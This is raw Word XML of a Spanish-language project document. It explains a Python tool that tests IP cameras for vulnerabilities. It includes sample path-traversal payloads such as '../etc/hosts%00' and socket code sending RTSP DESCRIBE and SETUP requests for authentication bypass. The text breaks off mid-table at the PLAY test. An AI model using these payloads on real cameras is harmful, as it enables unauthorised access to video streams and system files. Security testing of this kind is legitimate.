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01B" w:rsidRPr="0044601B" w:rsidRDefault="0044601B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="4F81BD" w:themeColor="accent1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0044601B">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="4F81BD" w:themeColor="accent1"/>
        </w:rPr>
        <w:t>Descripción</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0044601B" w:rsidRDefault="0044601B"/>
    <w:p w:rsidR="0036326A" w:rsidRDefault="0044601B">
      <w:r>
        <w:t>Para completar el desarrollo del proyecto, se ha desarrollado una herramienta programada en Python que realiza u</w:t>
      </w:r>
      <w:r w:rsidR="00C9521D">
        <w:t>na serie de pruebas automáticas. Dichas pruebas intentan encontrar vulnerabi</w:t>
      </w:r>
      <w:r w:rsidR="001071D8">
        <w:t>lidades por medio de http y rtsp</w:t>
      </w:r>
      <w:r w:rsidR="00C9521D">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0036326A" w:rsidRDefault="0036326A"/>
    <w:p w:rsidR="00C81553" w:rsidRDefault="0036326A">
      <w:r>
        <w:t>En los siguientes apartados, s</w:t>
      </w:r>
      <w:r w:rsidR="0076034E">
        <w:t>e pretende explicar de una manera clar</w:t>
      </w:r>
      <w:r>
        <w:t>a y concisa el funcionamiento de la herramienta.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C81553" w:rsidRDefault="0044601B" w:rsidP="00C81553">
      <w:pPr>
        <w:pStyle w:val="Ttulo4"/>
      </w:pPr>
      <w:r>
        <w:t>Contenido</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C81553" w:rsidRDefault="00C81553" w:rsidP="00C81553">
      <w:r>
        <w:t>La herramienta cuenta con los siguientes archivos:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C81553" w:rsidRDefault="00C81553" w:rsidP="00C81553">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00C81553">
        <w:t>test_rtsp_http.py</w:t>
      </w:r>
      <w:r>
        <w:t>: archivo que contiene el script en Python con el código de la herramienta.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0044601B" w:rsidRDefault="00C81553" w:rsidP="00C81553">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">ipCams.txt: fichero </w:t>
      </w:r>
      <w:r w:rsidR="0044601B">
        <w:t>donde se incluyen las IPs de las cámaras que se quieren testear.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009F54DA" w:rsidRDefault="0044601B" w:rsidP="00C81553">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>pathTransversal.txt: archivo que contiene los path que se quieren test</w:t>
      </w:r>
      <w:r w:rsidR="009F54DA">
        <w:t>e</w:t>
      </w:r>
      <w:r>
        <w:t>ar en la prueba de http Path Transversal.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0044601B" w:rsidRDefault="009F54DA" w:rsidP="00C81553">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="009F54DA">
        <w:t>rtspUris.txt</w:t>
      </w:r>
      <w:r>
        <w:t>: archivo que contiene las URIs que se quieren testear en las pruebas de rtsp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C81553" w:rsidRPr="00C81553" w:rsidRDefault="00232CD0" w:rsidP="00C81553">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Output.log: fichero de log que contiene las trazas que se escriben a la hora de lanzar el script.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00622752" w:rsidRDefault="00622752"/>
    <w:p w:rsidR="00622752" w:rsidRDefault="00622752" w:rsidP="00622752">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="4F81BD" w:themeColor="accent1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0044601B">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="4F81BD" w:themeColor="accent1"/>
        </w:rPr>
        <w:t>Configuración</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D08CE" w:rsidRDefault="00622752" w:rsidP="00622752">
      <w:r>
        <w:t>Tal y como se ha comentado en el apartado de Contenido, la herramienta cuenta con varios ficheros de configuración. A continuación se procede a detallar cada uno de ellos:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00622752" w:rsidRDefault="00622752" w:rsidP="00622752"/>
    <w:p w:rsidR="007D31A4" w:rsidRDefault="00FA3BD7" w:rsidP="00FA3BD7">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005C7203">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>ipCams.txt:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> este fichero contiene las direcciones IP de las cámaras que se quieren testear. Cada línea contendrá una dirección IP y no deberá existir ningún espacio entre IPs y, de la misma manera, no deberá contener ningún salto de línea ni ninguna línea vacía.</w:t>
      </w:r>
      <w:r w:rsidR="007D31A4">
        <w:t xml:space="preserve"> Por ejemplo, el contenido podría ser el siguiente:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007D31A4" w:rsidRPr="007D31A4" w:rsidRDefault="007D31A4" w:rsidP="007D31A4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1416"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5802"/>
      </w:tblGrid>
      <w:tr w:rsidR="007D31A4" w:rsidRPr="00F92F4F">
        <w:trPr>
          <w:trHeight w:val="440"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5802" w:type="dxa"/>
            <w:shd w:val="solid" w:color="595959" w:themeColor="text1" w:themeTint="A6" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w:rsidR="007D31A4" w:rsidRPr="00F92F4F" w:rsidRDefault="007D31A4" w:rsidP="007D31A4">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F92F4F">
              <w:rPr>
                <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>192.168.10.50</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="007D31A4" w:rsidRPr="00F92F4F" w:rsidRDefault="007D31A4" w:rsidP="007D31A4">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F92F4F">
              <w:rPr>
                <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>192.168.10.54</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="007D31A4" w:rsidRDefault="007D31A4" w:rsidP="007D31A4">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:ind w:left="1416"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="007D31A4" w:rsidRDefault="007D31A4" w:rsidP="007D31A4">
      <w:pPr>
        <w:ind w:firstLine="708"/>
      </w:pPr>
      <w:r>
        <w:t>(en este caso, se harán las pruebas contra estas 2 IP)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FA3BD7" w:rsidRDefault="00FA3BD7" w:rsidP="007D31A4">
      <w:pPr>
        <w:ind w:firstLine="708"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="007D31A4" w:rsidRDefault="00FA3BD7" w:rsidP="00FA3BD7">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="005C7203">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>pathTransversal.txt</w:t>
      </w:r>
      <w:r w:rsidR="000B76C4">
        <w:t>: archivo que contiene la</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">s </w:t>
      </w:r>
      <w:r w:rsidR="000B76C4">
        <w:t>URIs</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> que se van a testear en la prueba de</w:t>
      </w:r>
      <w:r w:rsidR="009F54DA">
        <w:t xml:space="preserve"> http Path Transversal. Cada path</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> deberá ir en una línea y no deberá existir ningún espacio ni ninguna línea vacía.</w:t>
      </w:r>
      <w:r w:rsidR="007D31A4">
        <w:t xml:space="preserve"> Por ejemplo, el contenido podría ser el siguiente:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007D31A4" w:rsidRDefault="007D31A4" w:rsidP="007D31A4">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1346"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024"/>
      </w:tblGrid>
      <w:tr w:rsidR="007D31A4" w:rsidRPr="007D31A4">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6024" w:type="dxa"/>
            <w:shd w:val="solid" w:color="595959" w:themeColor="text1" w:themeTint="A6" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w:rsidR="007D31A4" w:rsidRPr="00F92F4F" w:rsidRDefault="007D31A4" w:rsidP="007D31A4">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F92F4F">
              <w:rPr>
                <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>/etc/hosts</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="007D31A4" w:rsidRPr="00F92F4F" w:rsidRDefault="007D31A4" w:rsidP="007D31A4">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F92F4F">
              <w:rPr>
                <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>../../../../../../../../../../../../etc/hosts</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="007D31A4" w:rsidRPr="00F92F4F" w:rsidRDefault="007D31A4" w:rsidP="007D31A4">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F92F4F">
              <w:rPr>
                <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>../../../../../../../../../../../../etc/hosts%00</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="007D31A4" w:rsidRPr="007D31A4" w:rsidRDefault="007D31A4" w:rsidP="007D31A4">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F92F4F">
              <w:rPr>
                <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>/etc/hosts.allow</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="007D31A4" w:rsidRDefault="007D31A4" w:rsidP="007D31A4"/>
    <w:p w:rsidR="007D31A4" w:rsidRDefault="000B76C4" w:rsidP="007D31A4">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
      <w:r>
        <w:t>(en este caso, se hará la</w:t>
      </w:r>
      <w:r w:rsidR="007D31A4">
        <w:t xml:space="preserve"> prueba</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> de Path Transversal contra esta</w:t>
      </w:r>
      <w:r w:rsidR="007D31A4">
        <w:t xml:space="preserve">s 4 </w:t>
      </w:r>
      <w:r>
        <w:t>URIs</w:t>
      </w:r>
      <w:r w:rsidR="007D31A4">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007D31A4" w:rsidRDefault="007D31A4" w:rsidP="007D31A4">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009F54DA" w:rsidRDefault="000B76C4" w:rsidP="000B76C4">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="000B76C4">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>rtspUris.txt</w:t>
      </w:r>
      <w:r>
        <w:t>: archivo que contiene las URIs que se quieren testear en las pruebas de rtsp</w:t>
      </w:r>
      <w:r w:rsidR="009F54DA">
        <w:t xml:space="preserve">. Cada </w:t>
      </w:r>
      <w:r>
        <w:t>URI</w:t>
      </w:r>
      <w:r w:rsidR="009F54DA">
        <w:t xml:space="preserve"> deberá ir en una línea y no deberá existir ningún espacio ni ninguna línea vacía. Por ejemplo, el contenido podría ser el siguiente:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F92F4F" w:rsidRPr="00F92F4F" w:rsidRDefault="00F92F4F" w:rsidP="00F92F4F">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="FFFFFF" w:themeColor="background1"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1346"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024"/>
      </w:tblGrid>
      <w:tr w:rsidR="00F92F4F" w:rsidRPr="00F92F4F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6024" w:type="dxa"/>
            <w:shd w:val="solid" w:color="595959" w:themeColor="text1" w:themeTint="A6" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w:rsidR="00F92F4F" w:rsidRPr="00F92F4F" w:rsidRDefault="00F92F4F" w:rsidP="00F92F4F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F92F4F">
              <w:rPr>
                <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F92F4F" w:rsidRPr="00F92F4F" w:rsidRDefault="00F92F4F" w:rsidP="00F92F4F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F92F4F">
              <w:rPr>
                <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>/video.mp4</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F92F4F" w:rsidRPr="00F92F4F" w:rsidRDefault="00F92F4F" w:rsidP="00F92F4F">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F92F4F">
              <w:rPr>
                <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>/video.3gp</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00F92F4F" w:rsidRPr="00F92F4F" w:rsidRDefault="00F92F4F" w:rsidP="007D31A4">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F92F4F">
              <w:rPr>
                <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>/video.mjpg</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="009F54DA" w:rsidRDefault="009F54DA" w:rsidP="009F54DA"/>
    <w:p w:rsidR="009F54DA" w:rsidRDefault="009F54DA" w:rsidP="009F54DA">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
      <w:r>
        <w:t>(en este caso, se hará las prueba</w:t>
      </w:r>
      <w:r w:rsidR="00F92F4F">
        <w:t>s de RTSP se harán contra esta</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">s 4 </w:t>
      </w:r>
      <w:r w:rsidR="00F92F4F">
        <w:t>URIs)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D08CE" w:rsidRDefault="002D08CE" w:rsidP="002D08CE"/>
    <w:p w:rsidR="00FA3BD7" w:rsidRPr="00AF0B14" w:rsidRDefault="002D08CE" w:rsidP="002D08CE">
      <w:r>
        <w:t>Todos estos ficheros se deberán situar en el mismo directorio donde se encuentra el script.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C84B17" w:rsidRDefault="00C84B17"/>
    <w:p w:rsidR="00C9521D" w:rsidRDefault="00C9521D">
      <w:pPr>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Pruebas</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C9521D" w:rsidRDefault="00C9521D">
      <w:r>
        <w:t>La herramienta está programada para poder realizar las siguientes pruebas:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007E31D4" w:rsidRDefault="007E31D4" w:rsidP="00C9521D">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>RTSP Authentication B</w:t>
      </w:r>
      <w:r w:rsidR="00C9521D" w:rsidRPr="00C9521D">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>ypass</w:t>
      </w:r>
      <w:r w:rsidR="00C9521D">
        <w:t xml:space="preserve">: se intentará conectar a la cámara a través de RTSP saltándose la </w:t>
      </w:r>
      <w:r>
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidR="00C9521D">
        <w:t xml:space="preserve">utenticación. </w:t>
      </w:r>
      <w:r>
        <w:t>Para ello, existen 4 pruebas diferentes:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007E31D4" w:rsidRDefault="007E31D4" w:rsidP="007E31D4">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007E31D4">
        <w:t>Por medio del método DESCRIBE:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008131C6" w:rsidRPr="007E31D4" w:rsidRDefault="008131C6" w:rsidP="007E31D4">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293"/>
      </w:tblGrid>
      <w:tr w:rsidR="007E31D4" w:rsidRPr="007E31D4">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:trHeight w:val="1516"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6293" w:type="dxa"/>
            <w:shd w:val="solid" w:color="595959" w:themeColor="text1" w:themeTint="A6" w:fill="FFFFFF"/>
          </w:tcPr>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request = 'DESCRIBE ' + uri + ' RTSP/1.0\r\n'</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request+= 'CSeq: 1\r\n'</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request+= '\r\n'</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 = socket.socket()</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s.connect((cam_ip, RTSP_PORT))</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="007E31D4" w:rsidRPr="007E31D4" w:rsidRDefault="007E31D4" w:rsidP="007E31D4">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
              <w:spacing w:beforeLines="0" w:afterLines="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007E31D4">
              <w:rPr>
                <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
              </w:rPr>
              <w:t>s.send(request)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="008131C6" w:rsidRDefault="008131C6" w:rsidP="008131C6">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="007E31D4" w:rsidRDefault="007E31D4" w:rsidP="007E31D4">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007E31D4">
        <w:t xml:space="preserve">Por medio del método </w:t>
      </w:r>
      <w:r>
        <w:t>SETUP</w:t>
      </w:r>
      <w:r w:rsidRPr="007E31D4">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007E31D4" w:rsidRPr="007E31D4" w:rsidRDefault="007E31D4" w:rsidP="007E31D4">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304"/>
      </w:tblGrid>
      <w:tr w:rsidR="007E31D4" w:rsidRPr="007E31D4">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
            <w:bottom w:w="0" w:type="dxa"/>
          </w:tblCellMar>
        </w:tblPrEx>
        <w:trPr>
          <w:trHeight w:val="1516"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6304" w:type="dxa"/>
            <w:shd w:val="solid" w:color="595959" w:themeColor="text1" w:themeTint="A6" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w:rsidR="00BD13DB" w:rsidRDefault="00BD13DB" w:rsidP="007E31D4">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
              <w:spacing w:beforeLines="0" w:afterLines="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BD13DB">
              <w:rPr>
                <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
              </w:rPr>
              <w:t xml:space="preserve">request = 'SETUP ' + uri + ' RTSP/1.0\r\n'
            request+= 'CSeq: 1\r\n'
            </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00BD13DB" w:rsidRDefault="00BD13DB" w:rsidP="007E31D4">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
              <w:spacing w:beforeLines="0" w:afterLines="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BD13DB">
              <w:rPr>
                <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
              </w:rPr>
              <w:t>request+= 'Transport: RTP/AVP;unicast;client_port=4588-4589\r\n'</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="007E31D4" w:rsidRPr="00BD13DB" w:rsidRDefault="00BD13DB" w:rsidP="007E31D4">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
              <w:spacing w:beforeLines="0" w:afterLines="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
              </w:rPr>
              <w:t>request+= '\r\n'</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 = socket.socket()</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="007E31D4" w:rsidRPr="007E31D4" w:rsidRDefault="007E31D4"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s.connect((cam_ip, RTSP_PORT))</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="007E31D4" w:rsidRPr="007E31D4" w:rsidRDefault="007E31D4" w:rsidP="007E31D4">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
              <w:spacing w:beforeLines="0" w:afterLines="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007E31D4">
              <w:rPr>
                <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
              </w:rPr>
              <w:t>s.send(request)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="007E31D4" w:rsidRDefault="007E31D4" w:rsidP="007E31D4">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00BD13DB" w:rsidRDefault="00BD13DB" w:rsidP="00BD13DB">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007E31D4">
        <w:t xml:space="preserve">Por medio del método </w:t>
      </w:r>
      <w:r>
        <w:t>PLAY</w:t>
      </w:r>
      <w:r w:rsidRPr="007E31D4">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BD13DB" w:rsidRPr="007E31D4" w:rsidRDefault="00BD13DB" w:rsidP="00BD13DB">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340"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BD13DB" w:rsidRPr="007E31D4">
        <w:tblPrEx>
          <w:tblCellMar>
            <w:top w:w="0" w:type="dxa"/>
